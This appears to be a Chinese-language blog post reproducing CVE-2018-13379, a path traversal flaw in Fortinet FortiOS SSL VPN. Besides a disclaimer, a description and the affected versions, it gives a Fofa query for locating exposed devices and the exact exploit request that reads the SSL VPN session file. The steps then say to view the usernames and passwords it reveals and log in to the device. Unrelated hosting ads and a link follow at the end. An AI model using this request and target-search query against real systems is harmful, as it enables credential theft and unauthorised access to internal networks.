Fortigate SSL VPN路径遍历漏洞(CVE-2018-13379)
免责声明
仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。
漏洞描述
漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。
漏洞影响
Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。
漏洞危害
获取敏感信息,造成数据泄露,并且可获取账户密码直通内网
网络测绘
Fofa: body=“FortiToken clock drift detected”
漏洞复现
1. 访问链接查看是否存在漏洞
/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession
2. 查看用户名密码
3. 登录后台
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
相关推荐: ML.NET 3.0 增强了深度学习和数据处理能力
.NET团队在 2023.11.28 在博客上正式发布了 ML.NET 3.0::https://devblogs.microsoft.com/dotnet/announcing-ml-net-3-0/[1],强调了两个主要的兴趣点,即深度学习和数据处理,使开…